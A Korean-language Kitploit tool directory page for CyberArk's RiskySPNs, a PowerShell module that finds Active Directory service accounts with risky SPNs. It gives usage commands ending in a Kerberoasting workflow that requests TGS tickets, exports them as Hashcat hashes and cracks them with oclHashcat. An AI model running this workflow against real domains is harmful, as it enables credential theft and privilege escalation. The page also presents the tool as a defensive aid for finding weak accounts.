Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/cyberark/riskyspn
Password CrackingPrivilege EscalationPenetration TestingAuthenticationRed Teaming
GitHubcyberark/riskyspn

RiskySPN

위험한 SPN 감지 및 악용

저장소 보기
2657339년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RiskySPNs

RiskySPNs는 SPN(서비스 사용자 이름)과 관련된 계정을 탐지하고 악용하는 데 초점을 맞춘 PowerShell 스크립트 모음입니다. 이 모듈은 청팀이 잠재적으로 위험한 SPN을 식별하는 데 도움을 줄 뿐만 아니라, 적팀이 Kerberos 및 Active Directory를 활용하여 권한을 상승시키는 데에도 사용할 수 있습니다.

자세한 정보: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/

사용법

모듈 설치

root@kitploit:~
Import-Module .\RiskySPNs.psm1

또는 스크립트만 로드(웹에서 IEX로도 가능)

root@kitploit:~
. .\Find-PotentiallyCrackableAccounts.ps1

Set-ExecutionPolicy가 Unrestricted 또는 Bypass로 설정되어 있는지 확인하세요.

함수 정보 확인 (매우 상세함 :))

root@kitploit:~
Get-Help Get-TGSCipher -Full

모든 함수에는 -Verbose 모드도 있습니다.

취약한 SPN 검색

취약한 계정 찾기

root@kitploit:~
Find-PotentiallyCrackableAccounts

민감한 계정 + RC4 = $$$

취약 계정에 대한 상세 보고서 생성 (CISO <3)

root@kitploit:~
Export-PotentiallyCrackableAccounts

티켓 획득

SPN에 대한 Kerberos TGS 요청

root@kitploit:~
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

또는

root@kitploit:~
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

재미있는 부분 :)

root@kitploit:~
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3
도구 다운로드